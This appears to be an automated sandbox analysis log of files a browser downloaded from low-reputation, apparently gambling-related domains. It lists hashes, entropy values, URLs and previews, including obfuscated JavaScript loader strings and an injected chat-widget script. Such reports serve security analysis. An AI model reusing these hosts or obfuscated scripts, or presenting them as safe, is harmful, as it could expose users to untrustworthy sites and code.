                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 51040
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):6923
                                                                                                                                                          Entropy (8bit):7.966497753792618
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:gGzWJD0UqUdMjERb7WA4oosvijz7tpdNoyjlMR7i+:gIWJ5qUrOAfVqjPtnSgMhz
                                                                                                                                                          MD5:657C75ACB32EC5C4BBE754E74CEE87F1
                                                                                                                                                          SHA1:EAC1C97F5890172E01EF96F7072A61E16FB092B0
                                                                                                                                                          SHA-256:EC2DBC190D02E033780990A716E52AD3672EF244BF71CE89923157309B744934
                                                                                                                                                          SHA-512:E2928D994B69961B7AC13E78EBF8B54ED947A7127BEDBD7128784C880662A83DE5C1343E76D45B1BBEE883E526711C9FD81B10A8066991C7D38E3C55BC770300
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://brhrjf.yuhu06.xyz/ftl/commonPage/themes/gui-layer.css
                                                                                                                                                          Preview:...........]{.#.q._.b...;.7....%d$.|..+.")~. .d..-9C..ooE...).l9..."..99.q...9.WQ.|.56.`.....~.3{{.Ow......uu...N....y........9^.&........?80..t:.c.{........]...#g|8...71......../2~.].. r.h`........V.d.z...2..-.x....t.......G..4.`...3q..a.7...;...d.2.5D.o.U#...<rQ]0...l.!...J.G.-3.;...U.2PM..,+.....i...{...X.V...a.`..............7.....]-R. ....X.;...F...3....l..3H.8U.H..*.:X\i]w.........,....O...Z+ov....@.....iB.......A.7\.nE..pg.AZ....I.`c.M_[.....p".&.....7..`/....Sg.............\...z.N..K........ r..<........;...F..g......x...<...O.>.H|..7p..}|n|..K.W;;.Bx..1p..J-.........!r.|..wh...hG.I..v......X....y.F.b...*;..........`6r.X..O.}U........u.........g..6.{.....e.F.@[F..cE..em..l.Z...z..SuK.}-.$.x..d3/.s.1...s......t.......a5r.5..S...M.j.*I...<.S.(N.c....8q..V.r.v..D0G=h.....B..Wh.0...8r*=.!'.0.$...((.Z)'..EE.,...D....KV#4Z.Bn.(..T)7....M....D..s.MS#.d@...d.6F)4jP..MYrI.I4.F-..Ft.8.i...gW1...T.T#Mb-.JSUpia.$..v.x ..........?q.B..`0....YG>.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (1860), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1860
                                                                                                                                                          Entropy (8bit):5.829023981921665
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:VldewZmqDJPEtw/owqObi27Vx4uOi3QnyFE1991RMG1qm0VzYFx61cWHCQ0tN:VlMoHDJIwpHBTr3myM991i2JUEFx8sz
                                                                                                                                                          MD5:00A38A8AC85D6CE4AAF728B000BB91E3
                                                                                                                                                          SHA1:AB1883B4DF43F309E5CA34C399E84655BBCC48EF
                                                                                                                                                          SHA-256:85BA5B8A38D59ED24AB6408B066C6FE6AD5B7A2ED645B7E59A44C780F852FA45
                                                                                                                                                          SHA-512:7E3C8594DF0DA6C092F17FC6C9B1CCB6C05AB089C851716C1CFE6312B2966AC765BD1D8C6945AC64D886584F557422D5F42A953B2B6C88D48E93EB2AAAC9FB41
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/phoneBindingPopup.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjAZgDYAGAXQBoBvARTAA58AuAMwFc0YAXAS3UxHJpy3AJSUARKyQgABEk4Anbl3EBuAPJgAViC4A6ACYhm3NCAAKClBBALOAT0xDxAfRcgkAWRQHWAGxBxKgA3KD9WEEYAQmIAXxFVUIUZTgBebkxxABEDOmBxEXIUdL00TE5CpHTM4hgIZgLyBWrxADkATQAPdUaoVMwUTBFMSljyTR0uTAU9AFsoCABxEE5OWyRh7HFuJAAZFABzUyDxJDQAZRWeNAOTnYAVBXtzPyh7E6lbSxQTAPFSESFSgGKCcKAsdhcXhlMQKFasBRoSg7bxgbgBABCpgM0WI5CQAAsUMBorhyGi0AZzESzPd7DZGGh/H5YmMYChZhBWGscYNhqNxtpdJxpnMFstVutNts9odjuRThcrqZbgqHk8Xm8PtIFN9foEAYVgKCYATGMjZUc0BCODw+CAxEkZGhUpwCTtVCAAGRe8rupB6U26OCo9EgLGUobkN07PRnS6rFV6N0gMpsW3Q/hiNBxonAVK4VKpEB6OEHADCUEJ5msrAgADFXgdBHoKVSaSA6TZi63sdT0J36SB4iJWeRZisiQYkOaDAooCT01D7WIA0ZmFB/Jw9ABVHh+OMrStoUJITIQDsAWgg1kvMCgJ6rQWR8wOIAA6twDG7GABOYh4twr4gAAEiA3AHASnCMAArAB+IKDAjDANixJ6OWWStC45gAIL3CBADU4gAPRAVAb7XjAxHsrMszoMRF4Dm2SYQDcQTMOgnDlugJgHIw2CUJ0jCEPgeL2Iw+AAEwwdGICdNB4jiARAjMAAXow4gACzEBAnQyAAarYIJoFA4ixKQ8RsgSwahpi2I2suMKUE6ICuv6qgxgGOz7FaPpRJ5ejqs8rz2D6AWfLqVj6sm1lppCdplGg2Z6LYVgKAA/Guxibn4257uiehhLYnDvlAiIqk4KUKGlcweEg5EOow
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):3219
                                                                                                                                                          Entropy (8bit):7.711830310077625
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:/AvnLBdhEO4B8J3eG4kmYKCuOgitMI3+qSkcq1V1YrczmB4Zw75zzTyqOOuBYU8V:o+e4k6Ogm3+qSkcO89757yqOT8tyg
                                                                                                                                                          MD5:0D27A69210BB7A013C4C8A5818F8445D
                                                                                                                                                          SHA1:9ED20EF367552AC7809114B8F76AA9047DFEDE37
                                                                                                                                                          SHA-256:264AB3FB1C82264D29253449D8E575D0725BE16E4573A3C58019EAC6A643F191
                                                                                                                                                          SHA-512:25578DF3098B24D4C670838978669510621C78FF04CA8A876E18F1044732B552F14069C5C9B2AEF797A481ED298A2699AC14B4B80D9A3CEBC6A8503D04AAC226
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/image-pc/nav/icon-s/card_ky.png
                                                                                                                                                          Preview:.PNG........IHDR.............;0......tEXtSoftware.Adobe ImageReadyq.e<...riTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:420a253f-21eb-c14d-bee9-9f8f530514c9" xmpMM:DocumentID="xmp.did:A2A375E8A9E311E89D04D1A68640F071" xmpMM:InstanceID="xmp.iid:A2A375E7A9E311E89D04D1A68640F071" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:e3ebebca-fdfe-7542-a464-e0c8b8192ae8" stRef:documentID="xmp.did:B8082874819511E78C02F58BB957D46E"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>........IDATx..W...g..}.............r.[.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (1380), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1380
                                                                                                                                                          Entropy (8bit):5.793775006412735
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:VVlWw08EXYm/ZwDk5lOAO5HaNu9IRq0tjlIYtTm1qWG:VfWNIm2aIjHchjbm1k
                                                                                                                                                          MD5:04509D505B3AAFAFA9B91C94562074E8
                                                                                                                                                          SHA1:154785DE37CA0817F6449EF868436F7178E6E761
                                                                                                                                                          SHA-256:FF397F56C58A8E85397EADD86F51FE249DDD18C472255F40A9D0B6165ADCE251
                                                                                                                                                          SHA-512:77F5F7BB6E1848AD76ECF5FCE04227573D18B0813D2FC0299717EA5FE54F69BF442B0BC134F816C88617D3BA85ABC4D77E93BB693C34A5B1EC0D945F5BD45D5C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/inside.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtATATgEYBdAGgG8AlAMWoGEAuAMwFc0YAXAS3UxFLQBKcgF9SAc0IAPNMzaceaPgNIdhAIhZIQAAiQcATl07qA3AHkwAKxCcAdABMQTLmhAAFAygggDHAJ6YaKTqAPqhIEgAsigOLAA2IOoUAG5Q8SwgDACEAAwigqZpBjpcALwcmOq5MBBM6oKkSGXkaFAAtlnqrkhcTskQXhBIDNjq3J0G6mQwKO0Q6CBoHCPks/MAciDAI6zs3LzCBiAcLAZoOhx2IJi4ABz4gnYcABZLmFdgrg5BCfEhMAAQgA1QENQQiMQOKAcKByfaKTBHE5nNDkLjtcSAqDaBhcRzOKAJK50dD6KDLOwwBxoAASKH0AGp1AB6DFQcQgAC0EBgbLQvScLOS8S4+gYogE2wAyi8UMAGLkmnKFXlSO0UF9ElsdiqcoQmgYYAx1OpIaRgDCYC8JQASLwsDhZPYKXj8ITkYqXCovMWmEB2NqdbJlNCBjogABkkY+vqQdiQKrK2QN2g4ABUMSAUI7MC6DkphFckEayupYNwUlwAuoyhU7Pac07w50APzqQZzFDqBhXRuOgNB/jFpN5MSvMXPLMGVsbFjtMC+WOTia+QQMADMAFZcoIIWJ1hABw4JYn5TEtSBsWg3AZ4a7C+RjqdzlUNZf1CGJ/GSzAAD5/tk352O+XDatsZ7AII0ZVHKnSfnWwG/tGwGivo2BIUaxD7qQMDHDCIAnvmiLCF6IA+mKAhlMA3zynY0oANIAJIbKYlTqIQACCVjiA0VR2MKjJoMy/JOFIdhWEgDTPG8SjEbwHoBrabhSBmxhwHm8gFki5ABmhHChnYPR9FeFK3tGYbGU4163kZTrtABkqDjKSaWQKJk2b4FlGe51lmb4gYQQBSoBr+ZRKQ6zZDqQAageBuryoZcUgDqkEASmBSZWIKAtMcaBOHe8mPmRFFIFRSl4SABEAKKJJ0yyqO
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JSON data
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1091
                                                                                                                                                          Entropy (8bit):5.475838206015315
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:YvZLFLJxw8R5RWorwilPEIuhF7i+xRH9/pHILgIXTIRtRB+rfjj:Yv1FLJxwewo9BGNoLgnQz
                                                                                                                                                          MD5:6A5DDF5AB8DF0DD531823B695D9CEC54
                                                                                                                                                          SHA1:B32CADC489DAEFE4005A0CA19D66B7EC2E22DF99
                                                                                                                                                          SHA-256:01D49EF60AA6079B6ADD6CA798FF4467F574D0A85CA9A5BE8E20C343C5DC87ED
                                                                                                                                                          SHA-512:B5BE08EC1DBA5179A91386D1E1B5B6A3087A8F2FD949B62F7381E1F495B4882B7C3BCA9B8F3143DF1CCAE611764E09146562140A9E27EE50C6E0D6E17871D34F
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://ocsapi-lc.tingmeikj.com/zb-cloud/stat.do?pv=ajax&pa=host.info&domain=js326.cc&terminal=1&r=6219241436
                                                                                                                                                          Preview:{"analyticsCode":"(function(a, b, c, d, e, j, s) { a[d] = a[d] || function() { (a[d].a = a[d].a || []).push(arguments) }; j = b.createElement(c), s = b.getElementsByTagName(c)[0]; j.async = true; j.charset = 'UTF-8'; j.src = 'https://static.meiqia.com/widget/loader.js'; s.parentNode.insertBefore(j, s); })(window, document, 'script', '_MEIQIA'); _MEIQIA('entId', 'c0f51ba154f1c0d141fccf42aa8b5791');","domainType":1,"snType":1,"agentCode":"","paymentType":1,"h5AppLayerFlag":1,"zone":"","sn":"ll12","firstPageFlag":1,"forwardUrl":null,"isZone":false,"settings":{},"httpsEnabled":0,"loginBg":null,"webPath":"t4043","httpsSupport":0,"analyticsJs":"","loginLogo":null,"name":".......","onlineCustomerServiceUrl":"https://js2.jxxh8.icu/chatlink.html","preventPageFlag":1,"currencyCode":"CNY","icon":null,"snStatus":1,"webTitle":".......","isMaintain":0,"isBlock":"0","fromIp":"173.254.25
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1x1, components 1
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):332
                                                                                                                                                          Entropy (8bit):6.8679847753890115
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:dfNIOW/mfM8plt//kC7kmdViN0XxgRPWTTbOsvWGKkCHdcfmcGn1NMf/qLnDzofo:FC9YM8p//slJ0Xx0WzOsvWGKkCHdcfmx
                                                                                                                                                          MD5:BD9D76386CEE85AC4BE2F43FB3156A02
                                                                                                                                                          SHA1:D1BFC8928661CA2B2F71562EDC745419C582A88E
                                                                                                                                                          SHA-256:A26A53CFBFBF7CAE14898AC89EE39558CD9ED81D4E1D86FF2E5D17B6C185DC1F
                                                                                                                                                          SHA-512:7CDBE4BDD27C94FB93BE7DFFD3AB47BFA785FF578FB6EBFB5DEDA7527CA1122A76AAB1BBC900C02AA2E95686DC0B52CE95C9589721E89B771FBC7079C5057AD8
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://ocsapi-aka.blackkhaki918.com/ocs/cc.png?1717972858650
                                                                                                                                                          Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342..................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz.................................................................................?.....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 1 x 1, 1-bit colormap, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):98
                                                                                                                                                          Entropy (8bit):4.580480016229387
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:yionv//thPlE+kSI+DthC9/kITQoWlED//jp:6v/lhPfkCDtETT9WlEDTp
                                                                                                                                                          MD5:73DF4484683667DA60643329AF7DBDD9
                                                                                                                                                          SHA1:9AE16E29D964C6A1ADE80D1A98FDAC225C8DC291
                                                                                                                                                          SHA-256:D5C956BFFB7565A9DF0E1B3C80AFBA091A617944474243FE8C90D606D75090EC
                                                                                                                                                          SHA-512:29C8C67E0412D06164C72BF9B15B0C24FA5EC1015F11EC57653AA7B28561FC5FCE7384302A8C7978D1C9E3AA88939AF3C64FC68AF38844AC4DC3E72D7E6C76C1
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-qq.gzjqwlkj.com/cc.png?r=2281974097
                                                                                                                                                          Preview:.PNG........IHDR.............%.V.....gAMA......a.....PLTE...........IDAT..c`.......!.3....IEND.B`.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 155 x 155, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):42069
                                                                                                                                                          Entropy (8bit):7.986105347433876
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:9YVo/cIBlCJ95oN6S9UeqREGjMNma9Y6X2mD+28n30NKzE51:2hInCJB1e0bLaKS2mDtY0b
                                                                                                                                                          MD5:83287A5B3C9D62C121456B24CEC097A4
                                                                                                                                                          SHA1:6D9A341A2EABAE09AEB1C42C802F3C5796E41F66
                                                                                                                                                          SHA-256:19EAFB0F452BE229559452D9A020B4D79BCD2FCE3549E913C9605DFDFD34533B
                                                                                                                                                          SHA-512:C87270117C83D5EF01D9547D3A57EF37A456E2721CA7C15E8D460BEDAAC166C8B0DE112734DE4C14D956F12B4D59614D4512A248B800A3F001014D53EDCC407A
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/312/nav/liveCasino/01.png
                                                                                                                                                          Preview:.PNG........IHDR.............ua.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......IDATx...w.&Wu.o..'..y.&.F9G.(.@......$...b..wY.k......D..M..r.Q.ir...O.p...Q.t..$.@......LO?OU.:u....9..'.@$......|.Z....!.R..s...[n ......".....[lz......b..0.v../....../.?..?e{.1.P.....+.=.BD.Bz.._y....k../.?..?e.."..`..eP..Y..k6...+i....m_...._.9eC.(...8.O....#.#.......F..J.....'.X..;.*v.3Q.i!f..g.........!A...Z ,D.......T..l]uwO..>...?...l.I.=....|.<....#..a..B./...6.q/}.%._.{....$8.SD..s....i.{....._Jt.V.D.|..........n. .C2......P.Ao........~.j..H<...5..b.!I......"....L.[..P.H...I......'.[?a.....v.9.q1..w.7w......}..._.....a.. ..O)...;........G.N.._tcLf.r .8..?+.....5..>|...m.S..gX.9K....~&.fG*......#....c...^.....kfB..o.!.Xr.......iH..^.D...w-..^.{..^..d..g....Ty.....>..G ....~.X..OQ...v..I......X..y.-.o.a0.....j.(...W. .s..48.~.........B....Z.@.......c./...T?.U....*...)5.T..........2..AW.^E {.TA..+..,....K.x..+I.$....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):663
                                                                                                                                                          Entropy (8bit):7.521694983048398
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12:6v/7es/6Tn/YPc17zDKWgDaGJeF5t+/qBOotsnmHR5l9y:w/60Pc1/DKWg+GJA5FBBH7l9y
                                                                                                                                                          MD5:EF972EB21813224CC000334C3BC94A01
                                                                                                                                                          SHA1:EE1D39BF57907F6D9B42D140E07BDF1FF85ADD50
                                                                                                                                                          SHA-256:59386AFD3F9245FB3A774C44E4D6C720CD09D3E21F32C28BBEC26958CE2C87DF
                                                                                                                                                          SHA-512:451D4F0DB3D479439A77DA0194C293A4A859986546C68FB92F3BFC980EAC54785AFEC6F7283FC070B0A23C96727A09B37893F3A39918C2E822F944749B762FF1
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/nav/icon-s/live_astar_w.png
                                                                                                                                                          Preview:.PNG........IHDR.............;0......pHYs................IIDATH...K.Q...O.0."3.UEX...] *,.".....*...M.......B.A..$*..Y.VdT...Rj7..o..1...o...9.s.sR*c!9c.....g...8....G.Aj..d9P.....s ?t.".S...C.J...b.=....Z..Jr.S......5}.4.k.v.B.........1?..?q.........\......].......e.d`.P......{@G.Y.,.^...x...S.v.*..h.....N`%...V...R..v.(....#.]iTlSw....N..z)..N.V=.6..P[......}F,..}..;..1..y.....UEL..nQ?G..MF.w..Z.z..|S_.....l.I.V..L..P'...v..j.z6.^..s..$m%0!x..zmp&...K......R.).S`.PE..5............:. ..E.m.......<.......7.yQ.]Q...H."..5jI\.AG...t.Z......n....A.Z..Sg..#...VW...c$....9....+.. ....YP0"...k....Y.,.........S......IEND.B`.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):316994
                                                                                                                                                          Entropy (8bit):5.349542251999496
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:fn1klIkhkKbGUXb+/X5K4qzyutwTw8PG4NYhvUQHoXO0H0BWVPMbj:fnuhhkZy+cYutwE8PG4GOQIF0BWVPU
                                                                                                                                                          MD5:27E34DE2F2296D64B3F5BF4FFCA0E4AA
                                                                                                                                                          SHA1:947C048AD208F8C9962470E6664B0D383A2D6694
                                                                                                                                                          SHA-256:41F75723A62FF6132D037855E2AA24A033224327EB266DB175E87F07020D2678
                                                                                                                                                          SHA-512:DC994D4040277FC76F6D21656E893211A5BAA0CBEC7B1D2295184E8A26401C49A99418F5FA44FDF040FF2E903FFD3470D9573C5FF07C65F4B2855D131EAC0875
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/public/vendor.dll.js
                                                                                                                                                          Preview:var vendor_library=function(t){function e(r){if(n[r])return n[r].exports;var i=n[r]={i:r,l:!1,exports:{}};return t[r].call(i.exports,i,i.exports,e),i.l=!0,i.exports}var n={};return e.m=t,e.c=n,e.d=function(t,n,r){e.o(t,n)||Object.defineProperty(t,n,{configurable:!1,enumerable:!0,get:r})},e.n=function(t){var n=t&&t.__esModule?function(){return t.default}:function(){return t};return e.d(n,"a",n),n},e.o=function(t,e){return Object.prototype.hasOwnProperty.call(t,e)},e.p="",e(e.s=9)}([function(t,e,n){"use strict";function r(t){return"[object Array]"===O.call(t)}function i(t){return"[object ArrayBuffer]"===O.call(t)}function o(t){return"undefined"!=typeof FormData&&t instanceof FormData}function a(t){return"undefined"!=typeof ArrayBuffer&&ArrayBuffer.isView?ArrayBuffer.isView(t):t&&t.buffer&&t.buffer instanceof ArrayBuffer}function u(t){return"string"==typeof t}function s(t){return"number"==typeof t}function c(t){return void 0===t}function l(t){return null!==t&&"object"==typeof t}function f
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (2012), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2012
                                                                                                                                                          Entropy (8bit):5.893324704977723
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:VPuj9FERf+OkZxQtJzvM5AMk/vAn9c4jJBChIw5L7OTrQYiLxhrxhQzbBiZJekke:VPLtTkaG6/va9v9oOiDrxyh1RhG
                                                                                                                                                          MD5:A420264CCE92FA9A1A76E1C2E3F620E2
                                                                                                                                                          SHA1:6ED838DE4CEA93718906586C1FD19B9C6178F13E
                                                                                                                                                          SHA-256:4B1BE8007A5BDD8443FD1AE7A2942DE54618E78E943367DA0287B16DE951B613
                                                                                                                                                          SHA-512:C79544F817D3AFB3C3550BDF29DE122944AA413392A70FCBE7C2BEE3C9033A11E0EF480A1BA10349C73B74B66BB59FF204D9B15F0FD25E8486A1AA204A6A9A35
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/367/footerNav.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtALADgE4BdAGgG8o0B2QgLgDMBXNGAFwEt1M3SUBKcgF9SAIgBeAaQDU00YxbsuaHn1IdBopkhAACJGwBOHdqIDcAeTAArEOwB0AExAMOaEAAVDKCCENsAT0wUMQB9UJAkAFkURyYAGxBRCgA3KHimEDoAQgAGIX4zNMNdEABeDkxRXJgIBlF+UjQy8kcoNigFVk5uQUMQNiZDNHIOAFsAczpRZLcGFGnktCgUumwyGB8AgCUOCYALNjWyMBQUOGPSGEc0D3b9uhAnFygEtnsAYXQDKnfrtAAEigDOoxlAJiAAKrbAAyj2eDFe8XeXzQPzQfxuQIMcgA9ONwSAALQQGC4+YoNh+XHJClUwyheIcAyLUjQfzuQww5lHdbqJAASUmADkQMAcgBGUj7DjOABiZ3p3JZ2QlQhEmzGECYVMcdGEpDGA32sSQ+o1/XaID1zG6ykwgmKujYZTYMqQfDKwDcjhQwHsAGVJALhWZKqIJQBBawTBpVew06QoPE+kAAD3s1iQDXsbpAKltSm4AnI7wAJO402wAComOCYQs9FSCFD2GXyxV+ZVsABkPZ4bdlIAVlK7PLKrfbw87XJ5jXe4wmE/sdL89kXpAXaHmy9XhnX25C7z3jPHrZPTIMRSgJQ4u5n9k2EB2e0OZnLlZrdYbiibDvITzOIibz2JCnDxPYEJsF8z67AcbCYBwpCNvaJb9IMwzOo+WxwYcE4FAUm72Kc5z3qO+4kXARHsmwnLdsuNF0TyfDroKIpin2A7MkKEyisAy7cexwDzvYywpGR9KiSs9hglgKHcGwfQDEMaBYZe7yyT+doKYI7zQG6faiDS2SuvY+n7PYSBMGABiGJguSkBK/Cce8+xQEgFjALc3i+P4QSiMsRoNIZogme8gUgAAPpFA4RRU2B6fcxCPvsInmWURmODAAD8soZdIiVuvwhFsARxXFYaKAsLqXRFs2wgiE
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 80 x 81, 8-bit colormap, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):5045
                                                                                                                                                          Entropy (8bit):7.949409447443604
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:XJyevkittplPM3f9Rcp9O1/hb4iGTgjmIYJMRfjoc3xP9iMs0+9up0YrAy:XJykt5M7sO1/J4GT13xIUp0YrL
                                                                                                                                                          MD5:EF8E608FA5C775AC49C944A4DEF45C06
                                                                                                                                                          SHA1:6AA6ADE6D7FF5D0D588B428F12BCA33F024C6D52
                                                                                                                                                          SHA-256:8C34CCC1FFC2E53756C68BDFC06BBE41974EEB78E1E33AE1F07AAB21B67CC774
                                                                                                                                                          SHA-512:0AAAB72978E33AF65224AEDD9881878F1D4EBDD60107A3DF11622DC5C5495A03AFC9BC3185C8A439EAF5BB9A230558934237558414EFBC45A6FA6012BCC8DF12
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/image-pc/lotto/lottery_1218.png
                                                                                                                                                          Preview:.PNG........IHDR...P...Q.....r..:....PLTE...8M..C\.B\.Jc.o..C].z..@Z.E_.B\.Ld.Ng.h~.G`.D].Nf.Pi..........9U.?Y....3O.:U.Kd.6R.A[....>X. @.Wo.....<..C.0D.,@.1E.p..*>.g|.s..m.....':.k..S`...cx.Jc..$.EY.Vh..1...<S.Uc.4H..'.u..Yp.7K.P]...D].K^.@V.0E.Zi.Wf../.MZ.<D.]o.8O."5.GS.@J.Rl.Kb.>W.......Qc.]l..+..+.ax.<R.=P.5H.Nf.^u.=Q.ap.AT.9M..A.KW....5L.Sj.Rd.]t.Vo.7M.Xh.:N.6I.FX..0.4F..*. 3....j}....6R.7L.K^.Sb.%8.:L..*...Og.1H.2H.3H.!6.0D.4H.8K.':..-.HT.(<.:G.$6..........Tg.Ue.:N./C.BS..1.<K.BP.CN.......Zs.y..-D.$:.GW.Xk.CY.+C.......Zk.w..eu.>Q.)>.GX.@P..@.$6.:J.DP.@L..". 1..-..!.7@..........I^.>X....N^.,?.M\.#6.GU.>H./:.p.....j~.C_....+@.I[.8E.. .Gc.Xk.HZ.CV.[l.+<.6G.4B.0>..(....d{.2I.bq.M\..'.......&=.gw.Rb.Yh.LY.)4.w..}.....m|.CU.iw.Sf.s..`q./L..4.o}.*>.Q`.....3.x..4@.!-..'.o~.....p...&....)l....$tRNS........h....wvTF./`E.e .....x*..Q.p~(....FIDATX..iL.q.....j..9.G.....i..g!..A.,W:.!LG.*.b..2.F.W."....y.....&..@;..ZnVo...:........?....3s.E..3f..1..2g...T*. !A P.^..EL.1._..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 2088
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):797
                                                                                                                                                          Entropy (8bit):7.76373736359512
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:Xh54rz6dA/utp99m/R1M1//ZhJjF2+NqunH:XSz6dhp9Us1/RbNqsH
                                                                                                                                                          MD5:1BE1D6290006E67BCB2FACDFA571A4D1
                                                                                                                                                          SHA1:F5AE95AB95254A0834B9155E3594EF814F8C6837
                                                                                                                                                          SHA-256:02CB7CDD1B17375D306F6A4E3A16BA8B064166FCEFFD4BD45AF5ADC0AE37E894
                                                                                                                                                          SHA-512:4A90CEBC7FDACB4B92222F6A359761E99A14D8A7302747A3A3825EBDBECEBF0D9F20FBFC72560EF99FA4E5CDFD63120F544CEC9DB0BAC2DC03CC8D9413487227
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://8vpfnx.eveday.me/ftl/commonPage/js/websocket/PopUp.js
